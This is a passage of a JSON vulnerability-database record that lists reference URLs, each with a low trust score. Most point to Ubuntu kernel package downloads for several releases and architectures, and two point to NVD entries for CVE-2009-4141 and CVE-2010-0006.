        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-55.82_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4141"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-27.65_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.27_2.6.27-17.45_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-686_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.31_2.6.31-304.10_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0006"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb"
      },
      {
